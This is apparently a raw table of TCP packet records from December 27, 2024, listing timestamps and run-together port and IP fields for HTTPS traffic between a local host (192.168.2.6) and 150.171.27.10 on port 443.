                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.544543028 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.644232035 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.646157980 CET49745443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.646228075 CET44349745150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670718908 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670749903 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670767069 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670785904 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670798063 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670813084 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.670887947 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702723980 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702743053 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702856064 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702856064 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702867031 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.702960968 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708687067 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708702087 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708762884 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708769083 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708791971 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.708838940 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715626955 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715641975 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715706110 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715713024 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715744972 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.715785980 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722412109 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722425938 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722479105 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722484112 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722517967 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.722527981 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729330063 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729346037 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729392052 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729398012 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729439020 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.729439020 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735758066 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735770941 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735820055 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735825062 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735937119 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.735937119 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742692947 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742707014 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742788076 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742788076 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742794991 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.742854118 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.748703957 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.748718977 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.748753071 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.748759031 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.748819113 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.830892086 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.830931902 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.831003904 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.831016064 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.831028938 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.831091881 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.904016018 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.904040098 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.904135942 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.904145002 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.904194117 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.909987926 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910029888 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910062075 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910068035 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910089970 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910116911 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910135984 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910382032 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910399914 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910454035 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910465956 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910497904 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.910511017 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994110107 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994137049 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994178057 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994191885 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994225025 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:26.994254112 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.040277004 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.040298939 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.040374994 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.040384054 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.040455103 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.049598932 CET49753443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.049613953 CET44349753150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.069850922 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.069868088 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.069967031 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.069967031 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.069976091 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.070049047 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093266010 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093281984 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093424082 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093424082 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093434095 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.093478918 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184592962 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184645891 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184669018 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184679031 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184716940 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.184716940 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200418949 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200438976 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200531960 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200531960 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200541973 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.200620890 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.216176033 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.216196060 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.216321945 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.216344118 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.216603994 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.230258942 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.230278015 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.230407000 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.230417013 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.230483055 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.241837025 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.241853952 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.241905928 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.241914034 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.241950989 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.242016077 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.254152060 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.254169941 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.254252911 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.254262924 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.254311085 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.264874935 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.264890909 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.264966965 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.264975071 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.264983892 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.265032053 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.272217035 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.272267103 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.272644997 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.273858070 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.273869038 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.378321886 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.378344059 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.378451109 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.378462076 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.380110025 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.387497902 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.387514114 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.387579918 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.387587070 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.387646914 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.396214008 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.396229982 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.396398067 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.396406889 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.396461010 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.403719902 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.403734922 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.403820038 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.403829098 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.403878927 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.412241936 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.412260056 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.412329912 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.412339926 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.412409067 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.420358896 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.420373917 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.420450926 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.420459032 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.420515060 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.428893089 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.428909063 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.428970098 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.428977966 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.429008961 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.429054022 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.437501907 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.437520027 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.437602043 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.437608957 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.437644958 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580367088 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580391884 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580471992 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580481052 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580523014 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.580523014 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.588013887 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.588032007 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.588120937 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.588129044 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.588251114 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.595784903 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.595803976 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.595956087 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.595956087 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.595967054 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.596122980 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.602538109 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.602555990 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.602695942 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.602704048 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.602916002 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.610810995 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.610835075 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.610893011 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.610903025 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.611057997 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.617530107 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.617546082 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.617649078 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.617656946 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.617805004 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.625190020 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.625209093 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.625308990 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.625318050 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.625545979 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.632956982 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.632972956 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.633095980 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.633104086 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.633245945 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.647133112 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.647177935 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.647335052 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.648000002 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.648019075 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.784339905 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.784363985 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.784456015 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.784465075 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.784588099 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.791971922 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.791990042 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.792088985 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.792097092 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.792156935 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.799765110 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.799782991 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.799854040 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.799864054 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.799928904 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806488037 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806504965 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806557894 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806566000 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806629896 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.806629896 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814716101 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814738035 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814794064 CET49757443192.168.2.6150.171.27.10
